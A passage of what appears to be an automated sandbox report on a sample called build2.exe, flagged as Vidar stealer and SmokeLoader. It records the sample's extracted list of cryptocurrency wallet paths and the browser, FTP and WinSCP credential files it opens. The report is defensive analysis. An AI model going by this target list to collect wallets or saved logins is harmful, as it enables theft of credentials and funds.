Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Opens network shares

Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: \\config\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: \\config\

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\

Source: Yara match	File source: 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: build2.exe PID: 5316, type: MEMORYSTR

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 00000004.00000002.1982678563.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2343916720.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2344075429.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1710632872.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1982993082.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1710474391.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 19.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.build2.exe.2d915a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.build2.exe.2d915a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.2109889853.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2651384676.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: build2.exe PID: 7144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build2.exe PID: 5316, type: MEMORYSTR

Mitre Att&ck Matrix

